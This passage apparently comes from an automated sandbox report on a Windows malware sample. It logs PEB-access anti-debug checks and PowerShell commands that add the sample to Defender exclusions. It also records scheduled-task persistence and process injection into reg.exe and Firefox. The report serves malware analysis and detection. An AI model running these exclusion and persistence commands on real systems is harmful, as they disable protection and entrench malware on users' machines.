            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: 8_2_017A0BCD mov eax, dword ptr fs:[00000030h] | 8_2_017A0BCD
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: 8_2_017C0BCB mov eax, dword ptr fs:[00000030h] | 8_2_017C0BCB
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: 8_2_017C0BCB mov eax, dword ptr fs:[00000030h] | 8_2_017C0BCB
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: 8_2_017C0BCB mov eax, dword ptr fs:[00000030h] | 8_2_017C0BCB
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: 8_2_01836B40 mov eax, dword ptr fs:[00000030h] | 8_2_01836B40
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: 8_2_01836B40 mov eax, dword ptr fs:[00000030h] | 8_2_01836B40
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: 8_2_017B0BBE mov eax, dword ptr fs:[00000030h] | 8_2_017B0BBE
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: 8_2_017B0BBE mov eax, dword ptr fs:[00000030h] | 8_2_017B0BBE
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: 8_2_0186AB40 mov eax, dword ptr fs:[00000030h] | 8_2_0186AB40
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: 8_2_01848B42 mov eax, dword ptr fs:[00000030h] | 8_2_01848B42
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: 8_2_01854B4B mov eax, dword ptr fs:[00000030h] | 8_2_01854B4B
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: 8_2_01854B4B mov eax, dword ptr fs:[00000030h] | 8_2_01854B4B
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: 8_2_01872B57 mov eax, dword ptr fs:[00000030h] | 8_2_01872B57
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: 8_2_01872B57 mov eax, dword ptr fs:[00000030h] | 8_2_01872B57
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: 8_2_01872B57 mov eax, dword ptr fs:[00000030h] | 8_2_01872B57
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: 8_2_01872B57 mov eax, dword ptr fs:[00000030h] | 8_2_01872B57
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: 8_2_0184EB50 mov eax, dword ptr fs:[00000030h] | 8_2_0184EB50
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: 8_2_01874A80 mov eax, dword ptr fs:[00000030h] | 8_2_01874A80
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: 8_2_017DCA6F mov eax, dword ptr fs:[00000030h] | 8_2_017DCA6F
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: 8_2_017DCA6F mov eax, dword ptr fs:[00000030h] | 8_2_017DCA6F
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: 8_2_017DCA6F mov eax, dword ptr fs:[00000030h] | 8_2_017DCA6F
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: 8_2_017B0A5B mov eax, dword ptr fs:[00000030h] | 8_2_017B0A5B
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: 8_2_017B0A5B mov eax, dword ptr fs:[00000030h] | 8_2_017B0A5B
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: 8_2_017A6A50 mov eax, dword ptr fs:[00000030h] | 8_2_017A6A50
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: 8_2_017A6A50 mov eax, dword ptr fs:[00000030h] | 8_2_017A6A50
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: 8_2_017A6A50 mov eax, dword ptr fs:[00000030h] | 8_2_017A6A50
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: 8_2_017A6A50 mov eax, dword ptr fs:[00000030h] | 8_2_017A6A50
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: 8_2_017A6A50 mov eax, dword ptr fs:[00000030h] | 8_2_017A6A50
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: 8_2_017A6A50 mov eax, dword ptr fs:[00000030h] | 8_2_017A6A50
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: 8_2_017A6A50 mov eax, dword ptr fs:[00000030h] | 8_2_017A6A50
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: 8_2_017C4A35 mov eax, dword ptr fs:[00000030h] | 8_2_017C4A35
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: 8_2_017C4A35 mov eax, dword ptr fs:[00000030h] | 8_2_017C4A35
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: 8_2_017CEA2E mov eax, dword ptr fs:[00000030h] | 8_2_017CEA2E
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: 8_2_017DCA24 mov eax, dword ptr fs:[00000030h] | 8_2_017DCA24
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: 8_2_0182CA11 mov eax, dword ptr fs:[00000030h] | 8_2_0182CA11
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: 8_2_017DAAEE mov eax, dword ptr fs:[00000030h] | 8_2_017DAAEE
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: 8_2_017DAAEE mov eax, dword ptr fs:[00000030h] | 8_2_017DAAEE
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: 8_2_017A0AD0 mov eax, dword ptr fs:[00000030h] | 8_2_017A0AD0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: 8_2_017D4AD0 mov eax, dword ptr fs:[00000030h] | 8_2_017D4AD0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: 8_2_017D4AD0 mov eax, dword ptr fs:[00000030h] | 8_2_017D4AD0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: 8_2_017F6ACC mov eax, dword ptr fs:[00000030h] | 8_2_017F6ACC
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: 8_2_017F6ACC mov eax, dword ptr fs:[00000030h] | 8_2_017F6ACC
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: 8_2_017F6ACC mov eax, dword ptr fs:[00000030h] | 8_2_017F6ACC
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: 8_2_017A8AA0 mov eax, dword ptr fs:[00000030h] | 8_2_017A8AA0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: 8_2_017A8AA0 mov eax, dword ptr fs:[00000030h] | 8_2_017A8AA0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: 8_2_017F6AA4 mov eax, dword ptr fs:[00000030h] | 8_2_017F6AA4
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: 8_2_0184EA60 mov eax, dword ptr fs:[00000030h] | 8_2_0184EA60
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: 8_2_017D8A90 mov edx, dword ptr fs:[00000030h] | 8_2_017D8A90
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: 8_2_0181CA72 mov eax, dword ptr fs:[00000030h] | 8_2_0181CA72
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: 8_2_0181CA72 mov eax, dword ptr fs:[00000030h] | 8_2_0181CA72
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe"
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe"
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe"Jump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe"Jump to behavior
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeNtWriteVirtualMemory: Direct from: 0x76F0490C
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9C
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeNtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeNtReadVirtualMemory: Direct from: 0x76F02E8C
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeNtCreateKey: Direct from: 0x76F02C6C
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeNtSetInformationThread: Direct from: 0x76F02B4C
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeNtQueryAttributesFile: Direct from: 0x76F02E6C
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeNtAllocateVirtualMemory: Direct from: 0x76F048EC
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeNtQuerySystemInformation: Direct from: 0x76F048CC
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2C
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeNtOpenSection: Direct from: 0x76F02E0C
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeNtSetInformationThread: Direct from: 0x76EF63F9
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeNtDeviceIoControlFile: Direct from: 0x76F02AEC
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeNtAllocateVirtualMemory: Direct from: 0x76F02BEC
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeNtCreateFile: Direct from: 0x76F02FEC
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeNtOpenFile: Direct from: 0x76F02DCC
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeNtQueryInformationToken: Direct from: 0x76F02CAC
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2E
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeNtTerminateThread: Direct from: 0x76F02FCC
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeNtOpenKeyEx: Direct from: 0x76F02B9C
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeNtProtectVirtualMemory: Direct from: 0x76F02F9C
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeNtSetInformationProcess: Direct from: 0x76F02C5C
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeNtNotifyChangeKey: Direct from: 0x76F03C2C
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeNtCreateMutant: Direct from: 0x76F035CC
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeNtWriteVirtualMemory: Direct from: 0x76F02E3C
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeNtMapViewOfSection: Direct from: 0x76F02D1C
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeNtResumeThread: Direct from: 0x76F036AC
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFC
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeNtReadFile: Direct from: 0x76F02ADC
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeNtQuerySystemInformation: Direct from: 0x76F02DFC
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeNtDelayExecution: Direct from: 0x76F02DDC
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeNtQueryInformationProcess: Direct from: 0x76F02C26
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeNtResumeThread: Direct from: 0x76F02FBC
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeNtCreateUserProcess: Direct from: 0x76F0371C
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeSection loaded: NULL target: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeSection loaded: NULL target: C:\Windows\SysWOW64\reg.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeSection loaded: NULL target: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\reg.exeSection loaded: NULL target: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe protection: read write
            Source: C:\Windows\SysWOW64\reg.exeSection loaded: NULL target: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\reg.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\reg.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeSection loaded: NULL target: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe protection: execute and read and write
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeSection loaded: NULL target: C:\Windows\SysWOW64\reg.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\reg.exeThread register set: target process: 6488
            Source: C:\Windows\SysWOW64\reg.exeThread APC queued: target process: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe"
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe"
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AZJifQrhDpEQCA" /XML "C:\Users\user\AppData\Local\Temp\tmpB59F.tmp"
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Process created: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe "C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe"
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe  Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AZJifQrhDpEQCA" /XML "C:\Users\user\AppData\Local\Temp\tmpCB2B.tmp"
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe  Process created: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe "C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe"
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe  Process created: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe "C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe"
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe  Process created: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe "C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe"
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe  Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\SysWOW64\reg.exe"
            Source: C:\Windows\SysWOW64\reg.exe  Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe  Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\SysWOW64\reg.exe"
            Source: DAGiwzvTYsMjq.exe, 00000010.00000002.4129227175.0000000001550000.00000002.00000001.00040000.00000000.sdmp, DAGiwzvTYsMjq.exe, 00000010.00000000.1786733797.0000000001550000.00000002.00000001.00040000.00000000.sdmp, DAGiwzvTYsMjq.exe, 00000013.00000000.1856548789.00000000012B0000.00000002.00000001.00040000.00000000.sdmp  Binary or memory string: Shell_TrayWnd
            Source: DAGiwzvTYsMjq.exe, 00000010.00000002.4129227175.0000000001550000.00000002.00000001.00040000.00000000.sdmp, DAGiwzvTYsMjq.exe, 00000010.00000000.1786733797.0000000001550000.00000002.00000001.00040000.00000000.sdmp, DAGiwzvTYsMjq.exe, 00000013.00000000.1856548789.00000000012B0000.00000002.00000001.00040000.00000000.sdmp  Binary or memory string: Progman
            Source: DAGiwzvTYsMjq.exe, 00000010.00000002.4129227175.0000000001550000.00000002.00000001.00040000.00000000.sdmp, DAGiwzvTYsMjq.exe, 00000010.00000000.1786733797.0000000001550000.00000002.00000001.00040000.00000000.sdmp, DAGiwzvTYsMjq.exe, 00000013.00000000.1856548789.00000000012B0000.00000002.00000001.00040000.00000000.sdmp  Binary or memory string: Progmanlock
            Source: DAGiwzvTYsMjq.exe, 00000010.00000002.4129227175.0000000001550000.00000002.00000001.00040000.00000000.sdmp, DAGiwzvTYsMjq.exe, 00000010.00000000.1786733797.0000000001550000.00000002.00000001.00040000.00000000.sdmp, DAGiwzvTYsMjq.exe, 00000013.00000000.1856548789.00000000012B0000.00000002.00000001.00040000.00000000.sdmp  Binary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe  Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
